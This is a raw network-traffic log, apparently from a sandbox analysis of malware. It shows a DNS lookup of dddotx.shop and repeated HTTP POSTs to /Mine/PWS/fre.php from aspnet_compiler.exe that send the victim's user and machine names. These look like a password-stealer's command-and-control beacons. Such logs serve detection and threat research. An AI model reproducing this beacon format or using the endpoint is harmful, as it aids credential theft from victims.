Oct 24, 2024 17:03:52.944498062 CEST	80	50042	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:52.944528103 CEST	50042	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:52.944607973 CEST	50042	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:52.950649977 CEST	80	50042	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:53.078692913 CEST	50043	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:53.084151030 CEST	80	50043	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:53.084243059 CEST	50043	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:53.086359978 CEST	50043	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:53.091696024 CEST	80	50043	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:53.091767073 CEST	50043	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:53.097157955 CEST	80	50043	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:56.758740902 CEST	80	50043	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:56.758959055 CEST	50043	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:56.761482954 CEST	80	50043	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:56.761548996 CEST	50043	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:56.764327049 CEST	80	50043	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:56.904330969 CEST	50044	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:56.909961939 CEST	80	50044	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:56.910064936 CEST	50044	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:56.911874056 CEST	50044	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:56.917267084 CEST	80	50044	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:56.917337894 CEST	50044	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:56.922728062 CEST	80	50044	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:58.361933947 CEST	80	50044	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:58.362070084 CEST	50044	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:58.363658905 CEST	80	50044	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:58.363746881 CEST	50044	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:58.367517948 CEST	80	50044	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:58.498696089 CEST	50045	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:58.505397081 CEST	80	50045	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:58.505460024 CEST	50045	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:58.507231951 CEST	50045	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:58.513444901 CEST	80	50045	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:58.513506889 CEST	50045	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:58.519690037 CEST	80	50045	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:03.634898901 CEST	80	50045	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:03.635175943 CEST	50045	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:03.635195017 CEST	80	50045	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:03.635257006 CEST	50045	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:03.640563011 CEST	80	50045	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:03.793162107 CEST	50046	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:03.798623085 CEST	80	50046	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:03.798719883 CEST	50046	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:03.801635981 CEST	50046	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:03.806978941 CEST	80	50046	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:03.807044029 CEST	50046	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:03.812526941 CEST	80	50046	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:04.695522070 CEST	80	50046	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:04.695816040 CEST	50046	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:04.697179079 CEST	80	50046	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:04.697242975 CEST	50046	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:04.701191902 CEST	80	50046	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:04.854639053 CEST	50047	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:04.860356092 CEST	80	50047	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:04.860595942 CEST	50047	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:04.863425970 CEST	50047	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:04.868875027 CEST	80	50047	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:04.868949890 CEST	50047	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:04.874497890 CEST	80	50047	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:06.227567911 CEST	80	50047	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:06.227709055 CEST	50047	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:06.230074883 CEST	80	50047	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:06.230140924 CEST	50047	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:06.233149052 CEST	80	50047	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:06.381342888 CEST	50048	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:06.386893988 CEST	80	50048	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:06.387260914 CEST	50048	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:06.389303923 CEST	50048	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:06.395539999 CEST	80	50048	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:06.395714998 CEST	50048	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:06.401730061 CEST	80	50048	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:07.730067968 CEST	80	50048	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:07.731990099 CEST	80	50048	188.114.96.3	192.168.2.5
Oct 24, 2024 17:04:07.732121944 CEST	50048	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:07.732225895 CEST	50048	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:04:07.737626076 CEST	80	50048	188.114.96.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 17:02:06.678858042 CEST	58754	53	192.168.2.5	1.1.1.1
Oct 24, 2024 17:02:06.714082956 CEST	53	58754	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 17:02:06.678858042 CEST	192.168.2.5	1.1.1.1	0x3590	Standard query (0)	dddotx.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 17:02:06.714082956 CEST	1.1.1.1	192.168.2.5	0x3590	No error (0)	dddotx.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 17:02:06.714082956 CEST	1.1.1.1	192.168.2.5	0x3590	No error (0)	dddotx.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dddotx.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:06.727760077 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 180 Connection: close
Oct 24, 2024 17:02:06.733299017 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons849224ALFONS-PCk0FDD42EE188E931437F4FBE2CvHTg2
Oct 24, 2024 17:02:07.685256958 CEST	766	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMgj9mb5DVhPQViilaESkMqQRNq75FkFzoI86%2B%2FLSOAstlIlwPiQL5h74cjUZCc7p7UBysTTZ19hMyz8nMFB9yvoSMJmcAKMHPBnBPfu0MDayVtGoP9OvZG%2BLllipw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8977ab9485e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1746&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:07.824615955 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 180 Connection: close
Oct 24, 2024 17:02:07.830535889 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons849224ALFONS-PC+0FDD42EE188E931437F4FBE2CHPmgE
Oct 24, 2024 17:02:08.867274046 CEST	760	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTgg0Dw5vE2UisjnEfC4BAsTXGh8I6382tPffjx4Io4jsQ0Bpny6tTBVbkXqGg8FbI1f1OZf63b9gy6ZnjHHDQ8SB1CYA3dONWutngFsL6A3O5U4hTCnHH5MVQdhpw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad89e3be3e94e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:08.928268909 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:08.934077978 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:10.024525881 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p55%2BKJFax3KSWn7A8mrMkWn0ROBaqIS7qZnfZUPsgUBgqWcxHJ%2BJtEREWuekuQUTOm2FDg9DkVk%2FfJ18QUGrjbRp5%2B68%2B082QJIBFK5XZf9gK9TOuSkLPlk6dUEAlg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8a538e84786-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:10.179774046 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:10.185322046 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:11.080620050 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aZ%2Bk8VVpUjHRRvmiOKUeB72I%2BuC1srKilKQGSpyE3xN32f826mjJThsLfS4K1qWH7nVn9Ut0jr2pzzWYLV1s7r9awm2dYPjPiIggyly3zzanBcNux6ImQEpyM7I6uA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8acfa6a6b97-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:11.230082989 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:11.235526085 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:12.208580017 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TkBtg6ovQ5AdrN7h%2B2%2B%2F6p9NK004BkB9%2FhcWPdGyEP62UNdgjRM04rKchs7oORPcWsthMRlzjzzZy3jA2aj%2BFx8vJ6pjmbDLKT1K9Sb974wIoheJsvCXDSXf6Sahw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8b39d5245fb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:12.355288982 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:12.361135006 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:13.386910915 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0FNuz6F2UoI5GClneaGIROudjT4PRp%2B3IDQLFMOKtuQGk1T8lkOy%2Fgjap3lsUGwZCie7t9eX%2Fcy2hZDMKL9REwBKiQ23%2BXRqMN88lkc1x3sJA2daaSbyKISz8N95g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8ba9d936c07-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1813&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:13.543705940 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:13.549320936 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:16.922208071 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iH4Fa8tLW9McLFlEhMKCEI7kfWqKuNzQHDc8ULdEonwEx3GQFadEs606zJZCMnQnYTQLDoE6zYTG8RaYe384EQ3ACmAjKA5M7oJEiV%2BlYH%2BUuXiivqTWodT0fHWxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8c1fee26b06-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49717	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:17.072479010 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:17.079418898 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:20.447261095 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJOB3EqGfH%2Ferx6aJhQ6IR7IIiIetPbHGnxenIGVgYHUVNnD%2BbGvys3z%2BbYvnFzwokqpMKMEIUfdX92Ff9m4W2hlYnQZQ8P3ifyI4froXDHsRnpVr%2BWEGnJySGp7cw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8d82d666b27-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2279&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49735	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:20.602596998 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:20.619456053 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:21.532000065 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecqebKWXcrDHQbdTvxQvwg0fTJ%2Fp1F9iS96GakokyRmu%2Fkux%2Bjx6xK6DmtAvHcSYlB5HnuHbwh5kZXdQ3lupVJUVC7SFDY9lpzBC7hAZmP0OHyAwKTCfgGbnp2CSjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8ee6a696c39-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49745	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:21.685997009 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:21.691586971 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:22.993580103 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLe32ZI%2FG%2BuYU3ABNJRRuZeHkyNL00TkKjEOJCmQZPeVfr3a0hu6P3VKaIf%2BTosLtMLeOOtUS2YnzCnDiq3Vt4z3XMKOnN5JgCX6bvQjhEiZSLYP5MMh866Vqg0QhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad8f4ea04e972-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2639&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

